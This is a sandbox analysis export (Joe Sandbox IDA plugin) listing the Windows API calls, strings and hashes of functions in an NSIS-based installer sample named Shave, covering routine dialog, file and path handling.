                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 184305955-0
                                                                                                                                • Opcode ID: ee67474a1a288a69095d81a28a6b41206e342fd1b930cad1f65484e832d6543b
                                                                                                                                • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                                                                                • Opcode Fuzzy Hash: ee67474a1a288a69095d81a28a6b41206e342fd1b930cad1f65484e832d6543b
                                                                                                                                • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                  • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                • lstrcatW.KERNEL32(007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,007B5800,75923420,007B3000,00000000), ref: 00403A08
                                                                                                                                • lstrlenW.KERNEL32(007A69C0,007B3800,?,?,007A69C0,00000000,007B3800,007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,007B5800), ref: 00403A88
                                                                                                                                • lstrcmpiW.KERNEL32(007A69B8,.exe,007A69C0,007B3800,?,?,007A69C0,00000000,007B3800,007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                                                                                • GetFileAttributesW.KERNEL32(007A69C0), ref: 00403AA6
                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00403AEF
                                                                                                                                  • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                                                                                • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                                                                                • ShowWindow.USER32(00000005), ref: 00403BAF
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                                                                                • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                • API String ID: 1975747703-1115850852
                                                                                                                                • Opcode ID: 123c00e8e8eae349a6b6ffc178d207f9f8b23400aead47fb4df4bed5afc77f76
                                                                                                                                • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                                                                                • Opcode Fuzzy Hash: 123c00e8e8eae349a6b6ffc178d207f9f8b23400aead47fb4df4bed5afc77f76
                                                                                                                                • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D
                                                                                                                                APIs
                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
                                                                                                                                • GetSysColor.USER32(?), ref: 004044AD
                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404550
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                                                                                • SetCursor.USER32(00000000), ref: 004045CF
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                                                                                • SetCursor.USER32(00000000), ref: 004045EB
                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                • String ID: DC@$N
                                                                                                                                • API String ID: 3103080414-4075224758
                                                                                                                                • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                                                                                • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                                                                                APIs
                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                • String ID: F
                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                                                                                • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                                                                                APIs
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000000,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                                                                                • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                                                                                  • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                  • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D34
                                                                                                                                • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                                                                                • wsprintfA.USER32 ref: 00405F62
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405F9D
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405FAC
                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                                                                                                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00406052
                                                                                                                                  • Part of subcall function 00405D8D: GetFileAttributesW.KERNEL32(007B6800,00402F1D,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                  • Part of subcall function 00405D8D: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                • Opcode ID: 8e2ef562050374cbdee482ce01d0fc4b650d83fac470073e0dfd2f2c2df1a008
                                                                                                                                • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                                                                                • Opcode Fuzzy Hash: 8e2ef562050374cbdee482ce01d0fc4b650d83fac470073e0dfd2f2c2df1a008
                                                                                                                                • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorModeVersionlstrlen
                                                                                                                                • String ID: NSIS Error$UXTHEME
                                                                                                                                • API String ID: 758611499-110662866
                                                                                                                                • Opcode ID: 216c36faef8c5c050b55b88396924ad1417f673f7408521f9ddb59849cb913ab
                                                                                                                                • Instruction ID: a84716d26b240927f2f501cde0935ca932456bd970f48cf256b7861c77eac06c
                                                                                                                                • Opcode Fuzzy Hash: 216c36faef8c5c050b55b88396924ad1417f673f7408521f9ddb59849cb913ab
                                                                                                                                • Instruction Fuzzy Hash: FF218071500700ABD7207F61AE49B1B3AA8AB81705F01843FF981B62E2DF7D49558B6E
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                                                                                • lstrcmpiW.KERNEL32(007A69C0,007A1F20,00000000,?,?), ref: 00404866
                                                                                                                                • lstrcatW.KERNEL32(?,007A69C0), ref: 00404872
                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                                                                                  • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                                                                                  • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,00403347,007B5800,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                  • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                  • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,00403347,007B5800,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                  • Part of subcall function 0040652B: CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,00403347,007B5800,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                                                                                  • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                  • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                                                                                  • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: A
                                                                                                                                • API String ID: 2624150263-3554254475
                                                                                                                                • Opcode ID: f17bf99eb9744ef0591981256be4ea8978b4dd8b1bc8bb353c7e53d074d4b920
                                                                                                                                • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                                                                                • Opcode Fuzzy Hash: f17bf99eb9744ef0591981256be4ea8978b4dd8b1bc8bb353c7e53d074d4b920
                                                                                                                                • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(007A69C0,00000400), ref: 004063FA
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(007A69C0,00000400,00000000,007A0F00,?,00405336,007A0F00,?), ref: 0040640D
                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(6S@,?,00000000,007A0F00,?,00405336,007A0F00,?), ref: 00406449
                                                                                                                                • SHGetPathFromIDListW.SHELL32(?,007A69C0), ref: 00406457
                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00406462
                                                                                                                                • lstrcatW.KERNEL32(007A69C0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                                                                                • lstrlenW.KERNEL32(007A69C0,00000000,007A0F00,?,00405336,007A0F00,?), ref: 004064E0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                • String ID: 6S@$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                • API String ID: 717251189-2551480263
                                                                                                                                • Opcode ID: 6ca7045f1a7671301313a85d8900d55d77a8c8edd744d26f36594b0d48a563bf
                                                                                                                                • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                                                                                • Opcode Fuzzy Hash: 6ca7045f1a7671301313a85d8900d55d77a8c8edd744d26f36594b0d48a563bf
                                                                                                                                • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,00000006,00000008,0000000A), ref: 0040308E
                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,000000FF,00000000,00000000,?,?), ref: 004030F4
                                                                                                                                  • Part of subcall function 00402E79: DestroyWindow.USER32(?,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                Strings
                                                                                                                                • Inst, xrefs: 00402FC2
                                                                                                                                • vy, xrefs: 00402F6B
                                                                                                                                • Null, xrefs: 00402FD4
                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                • soft, xrefs: 00402FCB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocDestroyFileGlobalPointerWindow
                                                                                                                                • String ID: Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                                                                                • API String ID: 1580554587-3989296954
                                                                                                                                • Opcode ID: dd6470cab726a57cc84fa7a94d20a0cfb733827f7616c352e0bbc3f2355a85a1
                                                                                                                                • Instruction ID: 4f853fa222ecb05c404167484fdfded8992d3bc80b65af41a5722040fb63cb1a
                                                                                                                                • Opcode Fuzzy Hash: dd6470cab726a57cc84fa7a94d20a0cfb733827f7616c352e0bbc3f2355a85a1
                                                                                                                                • Instruction Fuzzy Hash: 9541B271A012059BDF20DF65DD85B9E7FA8EB0175AF14803BE900B62D5DB7C8E808B5D
                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                                                                                • GetSysColor.USER32(00000000), ref: 004042D0
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                                                                                • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                                                                                • GetSysColor.USER32(?), ref: 004042FB
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                                                                                • DeleteObject.GDI32(?), ref: 00404325
                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                                                                                • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                  • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                • String ID: 9
                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                                                                • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                                                                                • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                                                                • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                • String ID: ... %d%%$5
                                                                                                                                • API String ID: 551687249-3328568109
                                                                                                                                • Opcode ID: 2b12612690519de3068172d76ec2280cdcede413f29547579ccd35042eb19dae
                                                                                                                                • Instruction ID: 82e96eed204572331df772a9dc06b49ed9c909a247c3debab706571384c66a49
                                                                                                                                • Opcode Fuzzy Hash: 2b12612690519de3068172d76ec2280cdcede413f29547579ccd35042eb19dae
                                                                                                                                • Instruction Fuzzy Hash: 7841B171900209DBCB10DFA5DA84B9E7FB8AF44356F1442BBE915B72D0C7788B50CB99
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(007A0F00), ref: 00405337
                                                                                                                                • lstrlenW.KERNEL32(?,007A0F00), ref: 00405347
                                                                                                                                • lstrcatW.KERNEL32(007A0F00,?,?,007A0F00), ref: 0040535A
                                                                                                                                • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
